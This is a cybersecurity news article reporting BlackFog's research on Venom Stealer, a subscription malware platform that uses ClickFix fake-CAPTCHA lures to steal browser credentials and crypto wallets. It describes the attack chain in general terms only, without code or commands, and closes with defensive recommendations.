A new malware-as-a-service (MaaS) platform that combines ClickFix social engineering with automated data exfiltration and wallet detection is being sold on the dark web for $250 a month, or $1,800 for lifetime access.
Researchers from security firm BlackFog warn that the platform is more dangerous than commodity stealers such as Lumma, Vidar, and RedLine. That’s because while most malware infects, steals data, and then stops, Venom Stealer infects, steals, cracks, drains accounts, and keeps stealing.
The criminal developer, operating under the handle Venom Stealer, sells access as a subscription, with a vetted application process, Telegram-based licensing, and a 15% affiliate program.
According to BlackFog, multiple updates were shipped in March 2026 alone, and the pace of development points to a full-time operation.
Social engineering becomes automated attack chain
Security researchers describe a platform that operates like a well-oiled machine, beginning with social engineering and quickly turning into automated data theft and financial exploitation.
As the report explains, “The infection begins when a target lands on a ClickFix page hosted by the operator,” referring to scam pages that trick users into running malicious commands themselves.
Has your password leaked?
Victims are shown fake CAPTCHA checks or system errors and told to paste commands into the ‘Run dialog’ (Windows) or ‘Terminal’ (macOS).
Because the target initiates execution themselves, the process appears user-initiated,” the report notes, adding that security tools may not spot the activity.
This bypasses behavior-based detection, which looks for unusual program activity.
Bypassing browser encryption
The report notes that the malware can also bypass browser encryption.
“The moment the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile."
BlackFog Research
Researchers note that Chrome’s v10 and v20 password encryption is bypassed by gaining higher-privileged access that doesn’t trigger a User Account Control alert.
Stolen data is then sent out immediately, leaving little evidence on the device, making detection “significantly more difficult.”
Next in the chain is automated crypto theft, as any discovered wallet data is passed to a “server-side cracking engine” where encrypted wallets are unlocked and emptied.
The malware also searches for phrases such as “File Password” and “seed finder,” suggesting that even wallet keys stored offline may be compromised.
BlackFog explains that the pernicious platform can create a continuous pipeline even after infection because it stays active, “continuously monitoring Chrome’s LogIn Data,” stealing newly saved credentials in real time – making password resets ineffective.
To reduce exposure to threats like Venom, researchers recommend restricting
PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked